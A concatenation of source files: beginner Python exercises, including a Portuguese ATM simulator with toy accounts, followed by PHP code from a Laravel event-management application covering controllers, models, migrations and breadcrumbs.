print("9 - Mostar Cedulas")
print("10 - Incluir Cedulas")
return input("Escolha umas das opções acima: ")<file_sep>'''
It's is commnetary in python
'''
number=5
while number < 10:
print(number)
number+=1
if number == 8:
print("Break")
break
<file_sep>list=[1,4,6,8,10,12,14]
for item in list[0:3]:
if item >2:
print(item)
list2=["Marcos", "Roberto","Abreu"]
for name in list2:
if name == "Abreu":
print(name)
<file_sep>total=100
if total > 100:
print('Greater than 100')
elif total < 100:
print('Other condition')
else:
print("Error")<file_sep>def say_hello():
return "<NAME>"
print (say_hello())
<file_sep>#Imports Libs
import getpass
import os
accounts_list={
'0001-01':{
'password':'123',
'name':'<NAME>',
'value':'10.560',
'admin':False
},
'0001-02':{
'password':'987',
'name':'<NAME>',
'value':'10.560',
'admin':False
},
'1111-11':{
'password':'123',
'name':'Admin',
'value':'1000',
'admin':True
}
}
money_slips={
'20':5,
'50':5,
'100':5
}
while True:
print(" ")
print("***********************************************************")
print("********** School of Net - Caixa Eletronico *************")
print("***********************************************************")
print(" ")
#Dados da Conta
account_typed=input('Digite o Numero da Conta: ')
password_typed=getpass.getpass('Digite sua Senha: ')
#Dicionario de Contas
#Validando Conta com Uso de Dicionario
if account_typed in accounts_list and password_typed == accounts_list[account_typed]['password']:
os.system('cls' if os.name=='nt' else 'clear')
print("***********************************************************")
print("********** School of Net - Caixa Eletronico *************")
print("***********************************************************")
print("1 - Saldo")
print("2 - Saque")
if accounts_list[account_typed]['admin']:
print("9 - Mostar Cedulas")
print("10 - Incluir Cedulas")
option_typed=input("Escolha umas das opções acima: ")
if(option_typed == '1'):
print("Seu saldo é %s" % accounts_list[account_typed]['value'])
elif option_typed == '9' and accounts_list[account_typed]['admin']:
print(money_slips)
elif option_typed == '10' and accounts_list[account_typed]['admin']:
amount_typed=input("Digite a Quantidade de Cedulas: ")
money_bill_typed=input("Digite a Cedulas a ser Incluida: ")
money_slips[money_bill_typed]+=int(amount_typed)
print(money_slips)
elif option_typed == '2':
value_typed=input("Digite o Valor a ser Sacado: ")
money_slips_user={}
value_int=int(value_typed)
if value_int // 100 > 0 and value_int // 100 <= money_slips['100']:
money_slips_user['100']=value_int // 100
value_int=value_int - value_int // 100 * 100
if value_int // 50 > 0 and value_int // 50 <= money_slips['50']:
money_slips_user['50']=value_int // 50
value_int=value_int - value_int // 50 * 50
if value_int // 20 > 0 and value_int // 20 <= money_slips['20']:
money_slips_user['20']=value_int // 20
value_int=value_int - value_int // 20 * 20
if value_int != 0:
print("Cedulas indisponiveis para este Valor.")
print("Cedulas Disponiveis: 100,50,20")
else:
for money_bill in money_slips_user:
money_slips[money_bill]-=money_slips_user[money_bill]
print("Pegue as notas")
print(money_slips_user)
else:
print("Opção Invalida!")
else:
print("Conta Invalida, Tente Novamente!")
input("Pressione <ENTER> para Continuar...")
os.system('cls' if os.name=='nt' else 'clear') <file_sep>cars={}
cars['corola']="red"
cars['fir']="green"
cars['320']="black"
print(cars.keys())
print(cars.values())
print(cars['corola'])
people=dict(Joao='Father',Maria='Mother',Juca='daugther')
if('Juca' in people):
print(people['Juca'])
print(people)
family = {
'Carlos':'Father'
}
print(family)
funcionario={
}
|
36e2f6120931e3f68dc35a2030688cac5c388712
|
[
"Markdown",
"Python"
] | 15 |
Python
|
mrsilvestrini/course_python
|
29d9d706be3dfd47e8212f302355a4055b926427
|
cc2a124890a6fe2926ee7617ef998df70ba07075
|
refs/heads/main
|
<repo_name>MarkPowellDev/python-code<file_sep>/hello_world/hello_variables.py
name = 'mark'
age = 31
is_registered = True
print(name)
print(age)
print(is_registered)<file_sep>/flow_control/if.py
number = 17
green = True
red = False
if number <= 15:
if green is False:
if red is True:
print('Go')
else:
print('red is wrong, green is right')
else:
print('red is wrong, green is wrong')
else:
print('red is wrong, green is wrong, number is less than 17')
<file_sep>/flow_control/for_loops.py
import math
print(f'pi = {math.pi:.3f}.')
for y in range(1, 11):
print('{} '.format(y))
print('---------- b -------------')
for b in range(1, 11):
print('b',b)
print('---------- a -------------')
count = 1
for a in range(1, 11):
print(f'a', "_", count)
count += 1
print('---------- x -------------')
for x in range(1, 11):
print('{0:2d} {1:3d} {2:6d}'.format(x, x*x, x*x*x))
print('---------- c -------------')
for c in range(0, 11):
print('c', c)
print('---------- d -------------')
for d in range(5, 11):
print('d', d)
print('---------- i -------------')
for i in range(5):
print(i)
# message1 = 'Hello Again {} ({})'.format(name, age)
<file_sep>/strings/format_functions.py
"""
Sample code of string concatenation
"""
name = 'Mark'
age = 31
message = 'Hello ' + name + ' (' + str(age) + ')'
message1 = 'Hello Again {} ({})'.format(name, age)
print(message)
print(message1)
<file_sep>/flow_control/for_statements.py
# Measure some strings:
words = ['cat', 'window', 'dog']
for w in words:
print(w, len(w), '<---- The number of chars in the word')
#range with len
a = ['Mary', 'had', 'a', 'little', 'lamb']
for i in range(len(a)):
print(i, a[i])
for i in range(0, 10, 3):
print(i)
xx = sum(range(4))
print(xx, 'sum of range')
<file_sep>/strings/string_literals.py
name = 'Mark'
age = 31
message2 = f'Hello Again 3 {name} ({age})'
print(message2)
|
11bbc0259b79349605e1edf52e837d80c46aa83f
|
[
"Python"
] | 6 |
Python
|
MarkPowellDev/python-code
|
4aad541e2c7848662c19cc34b508b35991c91568
|
1af4399335d2d5653865f0041f87d78caa5ae4fb
|
refs/heads/master
|
<repo_name>seagullbird/cc-2019-team<file_sep>/src/main/java/io/vertx/starter/Q2Tweet.java
package io.vertx.starter;
import org.json.JSONObject;
public class Q2Tweet {
private Long senderUid;
private Long tweetId;
private Long targetUid;
private JSONObject hashTags;
private Long createdAt;
private String text;
public Q2Tweet(
Long senderUid,
Long tweetId,
Long targetUid,
JSONObject hashTags,
Long createdAt,
String text) {
this.senderUid = senderUid;
this.tweetId = tweetId;
this.targetUid = targetUid;
this.hashTags = hashTags;
this.createdAt = createdAt;
this.text = text;
}
public Long getSenderUid() {
return senderUid;
}
public Long getTweetId() {
return tweetId;
}
public Long getTargetUid() {
return targetUid;
}
public JSONObject getHashTags() {
return hashTags;
}
public Long getCreatedAt() {
return createdAt;
}
public String getText() {
return text;
}
}
<file_sep>/src/main/java/io/vertx/starter/DBVerticle.java
package io.vertx.starter;
import io.vertx.core.AbstractVerticle;
import io.vertx.core.eventbus.Message;
import io.vertx.core.json.JsonObject;
import io.vertx.core.logging.Logger;
import io.vertx.core.logging.LoggerFactory;
abstract class DBVerticle extends AbstractVerticle {
enum ErrorCodes {
NO_ACTION_SPECIFIED,
BAD_ACTION,
DB_ERROR
}
static final Logger LOGGER = LoggerFactory.getLogger(DBMySqlVerticle.class);
void onMessage(Message<JsonObject> message) {
if (!message.headers().contains("action")) {
message.fail(ErrorCodes.NO_ACTION_SPECIFIED.ordinal(), "No action header specified");
return;
}
String action = message.headers().get("action");
switch (action) {
case "words":
fetchQ3Words(message);
break;
case "texts":
fetchQ3Texts(message);
break;
case "q2":
fetchQ2(message);
break;
default:
message.fail(ErrorCodes.BAD_ACTION.ordinal(), "Bad action: " + action);
}
}
void reportQueryError(Message<JsonObject> message, Throwable cause) {
LOGGER.error("Database query error", cause);
message.fail(DBMySqlVerticle.ErrorCodes.DB_ERROR.ordinal(), cause.getMessage());
}
abstract void fetchQ2(Message<JsonObject> message);
abstract void fetchQ3Texts(Message<JsonObject> message);
abstract void fetchQ3Words(Message<JsonObject> message);
}
<file_sep>/src/main/resources/hbase.properties
hbase.zookeeper.quorum = 10.0.0.7,10.0.0.9,10.0.0.10
hbase.zookeeper.property.clientport = 2181
hbase.cluster.distributed = true
hbase.zookeeper.znode.parent = /hbase-unsecure
<file_sep>/src/main/java/io/vertx/starter/Q2User.java
package io.vertx.starter;
import org.json.JSONObject;
public class Q2User {
private Long userId;
private String description;
private String screenName;
private JSONObject hashtags;
private double finalScore;
private String latestContent;
public Q2User(Long userId, String screenName, String description, JSONObject hashtags) {
this.userId = userId;
this.description = description;
this.screenName = screenName;
this.hashtags = hashtags;
this.finalScore = 0.0;
}
public Long getUserId() {
return userId;
}
public String getDescription() {
return description;
}
public String getScreenName() {
return screenName;
}
public JSONObject getHashtags() {
return hashtags;
}
public void setFinalScore(double finalScore) {
this.finalScore = finalScore;
}
public double getFinalScore() {
return finalScore;
}
public String getLatestContent() {
return latestContent;
}
public void setLatestContent(String latestContent) {
this.latestContent = latestContent;
}
public String toString() {
return String.join("-", userId.toString(), description, screenName, hashtags.toString());
}
}
<file_sep>/src/main/java/io/vertx/starter/Q1Transaction.java
package io.vertx.starter;
import java.math.BigInteger;
import java.util.StringJoiner;
class Q1Transaction {
Long recv;
Long amt;
String time;
String hash;
Long send;
Long fee;
BigInteger sig;
String calcHash() {
StringJoiner sj = new StringJoiner("|");
sj.add(String.valueOf(time));
if (send != null) sj.add(String.valueOf(send));
else sj.add("");
sj.add(String.valueOf(recv));
sj.add(String.valueOf(amt));
if (fee != null) sj.add(String.valueOf(fee));
else sj.add("");
return OGCoin.ccHash(sj.toString());
}
boolean verifySig() {
if (sig == null) return true;
long n = send;
long txHashInt = Long.parseLong(hash, 16);
return BigInteger.valueOf(txHashInt)
.equals(sig.modPow(BigInteger.valueOf(OGCoin.key_e), BigInteger.valueOf(n)));
}
void sign() {
long txHashInt = Long.parseLong(hash, 16);
sig =
BigInteger.valueOf(txHashInt)
.modPow(BigInteger.valueOf(OGCoin.key_d), BigInteger.valueOf(OGCoin.key_n));
}
}
<file_sep>/src/main/java/io/vertx/starter/DBHBaseVerticle.java
package io.vertx.starter;
import io.vertx.core.Promise;
import io.vertx.core.eventbus.Message;
import io.vertx.core.json.JsonObject;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Get;
import org.apache.hadoop.hbase.client.Result;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.util.Bytes;
import org.json.JSONArray;
public class DBHBaseVerticle extends DBVerticle {
static final String queueName = "hbase.queue";
/** set the private IP address(es) of HBase zookeeper nodes. */
private final String zkPrivateIPs = "172.31.17.44";
/** The name of your HBase table. */
private final TableName tableName = TableName.valueOf("twitter");
/** HTable handler. */
private Table bizTable;
/** HBase connection. */
private Connection conn;
/** Byte representation of column family. */
private final byte[] q2BColFamily = Bytes.toBytes("q2");
private final byte[] q3BColFamily = Bytes.toBytes("q3");
@Override
public void start(Promise<Void> promise) throws Exception {
Configuration conf = HBaseConfiguration.create();
conf.set("hbase.zookeeper.quorum", zkPrivateIPs);
conf.set("hbase.master", zkPrivateIPs + ":14000");
conf.set("hbase.zookeeper.property.clientport", "2181");
conf.set("hbase.regionserver.handler.count", "60");
try {
conn = ConnectionFactory.createConnection(conf);
bizTable = conn.getTable(tableName);
} catch (Exception e) {
LOGGER.error(e);
e.printStackTrace();
}
vertx.eventBus().consumer(queueName, this::onMessage);
promise.complete();
}
@Override
void fetchQ2(Message<JsonObject> message) {
JsonObject request = message.body();
long reqUser = request.getLong("user");
byte[] descriptionCol = Bytes.toBytes("description");
byte[] screenNameCol = Bytes.toBytes("screen_name");
byte[] hashtagsCol = Bytes.toBytes("hashtags");
byte[] recordsCol = Bytes.toBytes("records");
Get get = new Get(Bytes.toBytes(String.valueOf(reqUser)));
get.addColumn(q2BColFamily, descriptionCol);
get.addColumn(q2BColFamily, screenNameCol);
get.addColumn(q2BColFamily, hashtagsCol);
get.addColumn(q2BColFamily, recordsCol);
try {
Result rs = bizTable.get(get);
JsonObject result = new JsonObject();
result.put("description", Bytes.toString(rs.getValue(q2BColFamily, descriptionCol)));
result.put("screen_name", Bytes.toString(rs.getValue(q2BColFamily,screenNameCol)));
result.put("hashtags", Bytes.toString(rs.getValue(q2BColFamily, hashtagsCol)));
result.put("records", (Bytes.toString(rs.getValue(q2BColFamily, recordsCol))));
message.reply(result);
} catch (Exception e) {
reportQueryError(message, e);
}
}
@Override
void fetchQ3Words(Message<JsonObject> message) {
JsonObject request = message.body();
}
@Override
void fetchQ3Texts(Message<JsonObject> message) {
JsonObject request = message.body();
}
}
|
c969b923e1f356ff96183a968ca99db7bfeb999b
|
[
"Java",
"INI"
] | 6 |
Java
|
seagullbird/cc-2019-team
|
c5ec99523e73ff337afa7db8bd177735f7add5d8
|
e3d92501efb8e5f2512ec61d84429224793fca34
|
refs/heads/master
|
<repo_name>xunmi67/wsc_pc<file_sep>/huaweiOJ/cont_sort.cpp
#include <iostream>
#include <cstdlib>
#include <cstring>
using namespace std;
static void init(char* str, int* alp_count, int* pos);
void count_sort(char* str, char *after);
static void insert(char *str, char *after, int *pos);
#define get_low(a) ((a<='Z'&&a>='A')?'a'+a-'A':a)
/*pos[count_of_nonalpha] must be useful!which means that */
static void init(char* str, int* alp_count, int* pos){
int i = 0;
int j = 0;//record non-alph position
while (str[i] != '\0'){
if (isalpha(str[i])){
alp_count[get_low(str[i]) - 'a']++;
}
else{
pos[j++] = i;
}
i++;
}
int previous = alp_count[0];
alp_count[0] = 0;
int temp = 0;
for (i = 1; i < 26; i++){
temp = alp_count[i];
alp_count[i] = alp_count[i - 1]+previous;
previous = temp;
}
pos[j] = strlen(str);//prepare for insert()
}
/*---------------below are test functions---------------*/
void test_init(){
char * str = "avc def Asss ";
int alp_count[26] = { 0 };
int *pos = (int*)calloc((strlen(str) + 1),sizeof(int));
init(str, alp_count, pos);
printf("a:%d,c:%d,d:%d,s:%d", alp_count[0], alp_count['c' - 'a'], alp_count['d' - 'a'], alp_count['s' - 'a']);
free(pos);
}
int main(char **agv, int agn){
test_init();
getchar();
}
|
72f3db81b3b474fad167e67f5197a5325fa074a8
|
[
"C++"
] | 1 |
C++
|
xunmi67/wsc_pc
|
7d206ca511fd46faf610c7448348c89e566a1efa
|
a15ef4c2ac9a5dd9fb217fa3dc9f7779b56048f0
|
refs/heads/master
|
<file_sep><?php
class BaseController extends Controller {
/**
* Message bag.
*
* @var Illuminate\Support\MessageBag
*/
protected $messageBag = null;
/**
* Breadcrumbs
*
* @var array
*/
protected $breadcrumbs = array();
/**
* Title
*
* @var string
*/
protected $title = '';
/**
* User
*
* @var User
*/
protected $user = null;
/**
* Which model to check against
* @var string
*/
protected $checkModel = '';
/**
* Which column to check for availability.
* @var string
*/
protected $checkColumn = 'name';
/**
* Which formfield to compare with on update.
* @var string
*/
protected $checkCompare = 'old';
/**
* Which Lang::get() message to display on error.
* @var string
*/
protected $checkMessage = 'false';
/**
* Initializer.
*
* @return void
*/
public function __construct()
{
// CSRF Protection
$this->beforeFilter('csrf', array('on' => 'post'));
//
$this->messageBag = new Illuminate\Support\MessageBag;
// Create user if available
if (Sentry::check())
{
try
{
$this->user = Sentry::getUser();
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('HomeController@index')->with('error', 'Access denied');
}
View::share('currentUser', $this->user);
}
}
/**
* Setup the layout used by the controller.
*
* @return void
*/
protected function setupLayout()
{
if ( ! is_null($this->layout))
{
$this->layout = View::make($this->layout);
}
}
public function getUser()
{
return $this->user;
}
/**
* Checks to see if a given resourxe exists in the database. Used by form validation.
*
* @return Response
*/
public function check()
{
try {
switch($this->checkModel) {
case 'ProfileField':
$resource = ProfileField::where($this->checkColumn, '=', Input::get($this->checkColumn))->firstOrFail();
break;
case 'Venue':
$resource = Venue::where($this->checkColumn, '=', Input::get($this->checkColumn))->firstOrFail();
break;
case 'ConEvent':
$resource = ConEvent::where($this->checkColumn, '=', Input::get($this->checkColumn))->firstOrFail();
break;
case 'user':
$resource = Sentry::findUserByLogin(Input::get($this->checkColumn));
break;
default:
throw new Exception('Model not found');
}
if (Input::has($this->checkCompare) && trim(Input::get($this->checkCompare)) === trim($resource->$this->checkColumn))
{
return Response::json(true);
}
return Response::json(Lang::get($this->checkMessage));
}
catch (Exception $e)
{
return Response::json(true);
}
}
}
<file_sep><?php
class OldConEventsController extends BaseController {
/**
* ConEvent Repository
*
* @var ConEvent
*/
protected $ConEvent;
public function __construct(ConEvent $ConEvent)
{
$this->ConEvent = $ConEvent;
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$events = $this->ConEvent->all();
return View::make('events.index', compact('events'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
return View::make('events.create');
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
$input = Input::all();
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$this->ConEvent->create($input);
return Redirect::route('events.index');
}
return Redirect::route('events.create')
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$ConEvent = $this->ConEvent->findOrFail($id);
return View::make('events.show', compact('event'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$ConEvent = $this->ConEvent->find($id);
if (is_null($ConEvent))
{
return Redirect::route('events.index');
}
return View::make('events.edit', compact('event'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), '_method');
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$ConEvent = $this->ConEvent->find($id);
$ConEvent->update($input);
return Redirect::route('events.show', $id);
}
return Redirect::route('events.edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->ConEvent->find($id)->delete();
return Redirect::route('events.index');
}
}
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class CreateProfileDataTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('profile_data', function(Blueprint $table) {
$table->increments('id');
$table->integer('profile_field_id');
$table->integer('user_id');
$table->text('value');
$table->enum('visibility', array('private', 'public'))->default('public');
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('profile_data');
}
}
<file_sep><?php
class Activity extends BaseModel
{
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'description' => 'required',
'starts_at' => 'required',
'ends_at' => 'required',
'con_event_id' => 'required',
'capacity' => 'required|integer|min:0',
);
public function event()
{
return $this->belongsTo('ConEvent', 'con_event_id');
}
public function category()
{
return $this->belongsTo('ActivityCategory', 'activity_category_id');
}
public function room()
{
return $this->belongsTo('Room');
}
public function participants()
{
// $participants = $this->belongsToMany('User')->with('host')->get();
// return $this->belongsToMany('User')->withPivot('host');
return $participants = $this->belongsToMany('User');
}
public function hosts()
{
return $this->belongsToMany('User')->withPivot('host');
}
public function getDuration($human = true)
{
$diff = $this->starts_at->diffInMinutes($this->ends_at);
if ($diff % 15 !== 0) {
// $diff = round($diff/10)*10;
$diff = ceil($diff / 15)*15;
// dd($diff);
}
if (!$human) {
return $diff;
}
$readable = array();
if ($diff >= 60) {
$readable[] = floor($diff / 60) . 'h';
}
if ($diff % 60) {
$readable[] = $diff % 60 . 'min';
}
return implode(' ', $readable);
}
public function getRoomName()
{
if ($this->all_rooms)
{
$room_name = strtolower(Lang::get('labels.all_rooms'));
}
elseif($this->room)
{
$room_name = $this->room->name;
}
else
{
$room_name = '';
}
return $room_name;
}
public function signupCapacity()
{
return floor($this->event->signup_limit * $this->capacity);
}
public function getPlacesLeft()
{
return $this->capacity - $this->participants->count();
}
public function hasPlacesLeft()
{
return $this->signupCapacity() - $this->participants->count();
}
static function getForDate($date, $event)
{
$activities = Activity::where('starts_at', '>=', $date->format('Y-m-d 00:00:00'))
->where('starts_at', '<', $date->copy()->addDay()->format('Y-m-d 00:00:00'))
->where('con_event_id', '=', $event->id)
->orderBy('starts_at', 'asc')
->orderBy('room_id', 'asc')
->get();
return $activities;
}
public function getStartsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
public function getEndsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
}
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class AddHostsIndexToActivities extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::table('activities', function(Blueprint $table) {
$table->string('hosts')->nullable();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::table('activities', function(Blueprint $table) {
$table->dropColumn('hosts');
});
}
}
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class AddVisibilityToConEvents extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::table('con_events', function(Blueprint $table) {
$table->enum('visibility', array('private', 'public'))->default('public');
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::table('con_events', function(Blueprint $table) {
$table->dropColumn('visibility');
});
}
}
<file_sep><?php
class DatabaseSeeder extends Seeder {
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
Eloquent::unguard();
// $this->call('UserTableSeeder');
// $this->call('ConeventsTableSeeder');
// $this->call('VenuesTableSeeder');
// $this->call('ActivitiesTableSeeder');
// $this->call('RoomsTableSeeder');
// $this->call('FeaturesTableSeeder');
$this->call('CountriesTableSeeder');
// $this->call('UsersTableSeeder');
$this->call('GroupsTableSeeder');
}
}
<file_sep><?php
class VenuesTableSeeder extends Seeder {
public function run()
{
// Uncomment the below to wipe the table clean before populating
// DB::table('venues')->truncate();
$venues = array(
);
// Uncomment the below to run the seeder
// DB::table('venues')->insert($venues);
}
}
<file_sep><?php
class Room extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'description' => 'required',
'capacity' => 'required|integer',
'venue_id' => 'required'
);
public function venue()
{
return $this->belongsTo('Venue');
}
public function activities()
{
return $this->hasMany('Activity');
}
}
<file_sep><?php
return array(
// General stuff
"base_title" => "Admin",
"admin_intro" => "Select which resource to manage in the menu above or among the buttons below.",
"title" => "Admin",
"show" => "View",
"create" => "Add",
"edit" => "Edit",
"destroy" => "Delete",
"import" => "Import",
"export" => "Export",
"invite" => "Invite",
'public' => 'Public',
);
<file_sep><?php
class AdminProfileFieldsController extends BaseController {
/**
* ProfileField Repository
*
* @var ProfileField
*/
protected $profileField;
public function __construct(ProfileField $profileField)
{
$this->profileField = $profileField;
$types = array(
'string' => Lang::get('labels.type.string'),
'text' => Lang::get('labels.type.text'),
'option' => Lang::get('labels.type.option'),
'checkbox' => Lang::get('labels.type.checkbox'),
'select' => Lang::get('labels.type.select'),
'multi' => Lang::get('labels.type.multi'),
// 'relation' => Lang::get('labels.type.relation'),
);
View::share('types', $types);
// Set up checker
$this->checkModel = 'ProfileField';
$this->checkMessage = 'messages.check_profileField';
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$profileFields = ProfileField::orderBy('sort_order')->orderBy('id')->get();
return View::make('admin.profileFields.index', compact('profileFields'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
return View::make('admin.profileFields.create');
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
$input = array_except(Input::all(), array('_method', '_token', 'events'));
$validation = Validator::make($input, ProfileField::$rules);
if ($validation->passes())
{
$this->profileField = ProfileField::create($input);
if (Input::has('events'))
{
$this->profileField->events()->sync(Input::get('events'));
}
return Redirect::action('AdminProfileFieldsController@index')
->with('success', Lang::get('messages.create_success', array('model' => ucfirst(Lang::get('labels.field')))));
}
return Redirect::action('AdminProfileFieldsController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$field = $this->profileField->findOrFail($id);
return View::make('admin.profileFields.show', compact('field'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$field = $this->profileField->find($id);
$selected_events = array();
foreach($field->events as $event)
{
$selected_events[] = $event->id;
}
if (is_null($field))
{
return Redirect::action('AdminProfileFieldsController@index')
->with('error', Lang::get('not_found', array('model' => Lang::get('labels.field'))));
}
return View::make('admin.profileFields.edit', compact('field', 'selected_events'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token', '_old_name', 'events'));
if (!Input::has('visibility_control'))
{
$input['visibility_control'] = false;
}
$validation = Validator::make($input, ProfileField::$rules);
if ($validation->passes())
{
$profileField = ProfileField::find($id);
$profileField->update($input);
if (Input::has('events'))
{
$profileField->events()->sync(Input::get('events'));
}
return Redirect::action('AdminProfileFieldsController@show', $id)
->with('success', Lang::get('messages.update_success', array('model' => ucfirst(Lang::get('labels.field')))));
}
return Redirect::action('AdminProfileFieldsController@edit', $id)
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->profileField->find($id)->delete();
if (Request::ajax())
{
return json_encode(true);
}
else
{
return Redirect::action('AdminProfileFieldsController@index')
->with('success', Lang::get('messages.destroy_success', array('model' => ucfirst(Lang::get('labels.field')))));
}
}
}
<file_sep><?php
use Cartalyst\Sentry\Users\Eloquent\User as SentryUserModel;
class User extends SentryUserModel {
public static $rules = array(
'name' => 'required|min:2',
// 'description' => 'required',
// 'capacity' => 'required',
// 'venue_id' => 'required'
);
public function events()
{
return $this->belongsToMany('ConEvent');
}
public function activities()
{
return $this->belongsToMany('Activity');
}
public function hosted()
{
return $this->belongsToMany('Activity', 'activity_user', 'user_id_host', 'activity_id');
}
public function country()
{
return $this->belongsTo('Country');
}
public function profileData()
{
return $this->hasMany('ProfileData');
}
}
<file_sep><?php
/**
* Breadcrumbs
*/
Breadcrumbs::setView('snippets.breadcrumbs');
/**
* Home
*/
Breadcrumbs::register('home', function($breadcrumbs)
{
$breadcrumbs->push(Lang::get('labels.home'), route('home'));
});
/**
* Users
*/
Breadcrumbs::register('user.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push(Lang::get('labels.users'), action('UsersController@getIndex'));
});
Breadcrumbs::register('user.show', function($breadcrumbs, $user) {
$breadcrumbs->parent('user.index');
$breadcrumbs->push($user->name, action('UsersController@getShow', $user->id));
});
Breadcrumbs::register('user.edit', function($breadcrumbs, $user)
{
$breadcrumbs->parent('user.show', $user);
$breadcrumbs->push(Lang::get('admin.edit'), action('UsersController@getEdit'));
});
/**
* Countries
*/
Breadcrumbs::register('country.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push('Countries', action('CountriesController@getIndex'));
});
Breadcrumbs::register('country.show', function($breadcrumbs, $country) {
$breadcrumbs->parent('country.index');
$breadcrumbs->push($country->name, action('CountriesController@getShow', $country->id));
});
/**
* Events
*/
Breadcrumbs::register('event.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push(Lang::get('labels.events'), action('ConEventsController@getIndex'));
});
Breadcrumbs::register('event.show', function($breadcrumbs, $event) {
$breadcrumbs->parent('home');
$breadcrumbs->push($event->name, action('ConEventsController@getShow', $event->id));
});
Breadcrumbs::register('event.schedule', function($breadcrumbs, $event) {
$breadcrumbs->parent('event.show', $event);
$breadcrumbs->push(Lang::get('labels.schedule'), action('ConEventsController@getSchedule', $event->id));
});
Breadcrumbs::register('event.participants', function($breadcrumbs, $event) {
$breadcrumbs->parent('event.show', $event);
$breadcrumbs->push(Lang::get('labels.participants'), action('ConEventsController@getParticipants', $event->id));
});
Breadcrumbs::register('event.activity', function($breadcrumbs, $event, $activity) {
$breadcrumbs->parent('event.show', $event);
$breadcrumbs->push($activity->name, action('ActivitiesController@getShow', $activity->id));
});
Breadcrumbs::register('event.activity.participants', function($breadcrumbs, $event, $activity) {
$breadcrumbs->parent('event.activity', $event, $activity);
$breadcrumbs->push(Lang::get('labels.participants'), action('ActivitiesController@getParticipants', $activity->id));
});
/**
* Venues
*/
Breadcrumbs::register('venue.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push('Venues', action('VenuesController@getIndex'));
});
Breadcrumbs::register('venue.show', function($breadcrumbs, $venue) {
$breadcrumbs->parent('venue.index');
$breadcrumbs->push($venue->name, action('VenuesController@getShow', $venue->id));
});
/**
* Admin
*/
/**
* Home
*/
Breadcrumbs::register('admin.home', function($breadcrumbs)
{
$breadcrumbs->push('Admin', action('AdminController@getIndex'));
});
/**
* Events
*/
Breadcrumbs::register('admin.event.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.events'), action('AdminConEventsController@index'));
});
Breadcrumbs::register('admin.event.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.event.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminConEventsController@create'));
});
Breadcrumbs::register('admin.event.show', function($breadcrumbs, $event) {
$breadcrumbs->parent('admin.event.index');
$breadcrumbs->push($event->name, action('AdminConEventsController@show', $event->id));
});
Breadcrumbs::register('admin.event.edit', function($breadcrumbs, $event)
{
$breadcrumbs->parent('admin.event.show', $event);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminConEventsController@edit'));
});
/**
* Venues
*/
Breadcrumbs::register('admin.venue.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.venue'), action('AdminVenuesController@index'));
});
Breadcrumbs::register('admin.venue.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.venue.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminVenuesController@create'));
});
Breadcrumbs::register('admin.venue.show', function($breadcrumbs, $venue) {
